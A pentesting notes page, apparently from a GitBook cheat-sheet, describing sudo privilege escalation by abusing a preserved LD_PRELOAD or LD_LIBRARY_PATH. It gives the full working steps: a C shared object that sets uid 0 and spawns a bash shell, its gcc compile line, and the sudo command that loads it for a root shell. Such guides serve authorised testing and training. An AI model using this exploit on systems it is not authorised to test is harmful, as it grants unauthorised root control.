Linux Privilege Escalation
  • Ansible Playbook Privilege Escalation
  • Apache Conf Privilege Escalation
  • Bash eq Privilege Escalation
  • Buffer Overflow Privilege Escalation
  • Chrome Remote Debugger Pentesting
  • Doas Privilege Escalation
  • Ghidra Debug Mode RCE
  • Gnuplot Privilege Escalation
  • LXC/LXD (Linux Container/Daemon) Privilege Escalation
  • Linux Privilege Escalation
  • Mozilla Pentesting
  • OpenSSL Privilege Escalation
  • Pip Download Code Execution
  • PolKit Privilege Escalation
  • Python Eval Code Execution
  • Python Jails Escape
  • Python Privilege Escalation
  • Python Yaml Privilege Escalation
  • Ruby Privilege Escalation
  • Rust Privilege Escalation
  • SSSD Privilege Escalation
  • Shared Library Hijacking
  • Snapd Privilege Escalation
  • Sudo ClamAV Privilege Escalation
  • Sudo Dstat Privilege Escalation
  • Sudo Exiftool Privilege Escalation
  • Sudo Fail2ban Privilege Escalation
  • Sudo Git Privilege Escalation
  • Sudo Java Privilege Escalation
  • Sudo OpenVPN Privilege Escalation
  • Sudo Path Traversal Privilege Escalation
  • Sudo Privilege Escalation
  • Sudo Privilege Escalation by Overriding Shared Library
  • Sudo Reboot Privilege Escalation
  • Sudo Screen Privilege Escalation
  • Sudo Service Privilege Escalation
  • Sudo Shutdown, Poweroff Privilege Escalation
  • Sudo Systemctl Privilege Escalation
  • Sudo Tee Privilege Escalation
  • Sudo Umount Privilege Escalation
  • Sudo Vim Privilege Escalation
  • Sudo Wall Privilege Escalation
  • Sudo Wget Privilege Escalation
  • Sudoedit Privilege Escalation
  • Tar Wildcard Injection PrivEsc
  • Update-Motd Privilege Escalation
  • irb (Interactive Ruby Shell) Privilege Escalation
  • Linux Backdoors
  • Linux Pivoting
  • Post eploitation
Powered by GitBook
On this page

Sudo Privilege Escalation by Overriding Shared Library

LD_PRELOAD and LD_LIBRARY_PATH might be vulnerable to privilege escalation (PrivEsc).

LD_PRELOAD, LD_LIBRARY_PATH Overwriting

Investigation

Check sudo commands.

sudo -l
Copied!

The below is the output example.

env_keep+=LD_PRELOAD

(ALL : ALL) NOPASSWD: somecmd
Copied!

If we find the sudo command keeps LD_PRELOAD environment, we can overwrite this variable to load our custome shared object and escalate the privileges.

Also, we can replace the LD_PRELOAD with LD_LIBRARY_PATH.

By the way, to list shared libraries required by the executable, use ldd command.

ldd somecmd
Copied!

Exploitation

First off, create exploit.c under /tmp .

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void inject()__attribute__((constructor));

void inject() {
	unsetenv("LD_PRELOAD");
	setuid(0);
	setgid(0);
	system("/bin/bash");
}
Copied!

  • The "constructor" attribute is a special type of function attribute in GCC. It tells the compiler to automatically call the function before the main function.

Now compile the c program to shared object.

# -fPIC: Generate Position Independent Code.
# -shared: Generate a shared library.
# -o: Output shared object.
gcc  -fPIC -shared -o exploit.so exploit.c
Copied!

We can execute command with setting the shared library to LD_PRELOAD variable then spawn the root shell.

sudo LD_PRELOAD=/tmp/exploit.so somecmd
PreviousSudo Privilege EscalationNextSudo Reboot Privilege Escalation

Last updated 1 year ago

Page cover image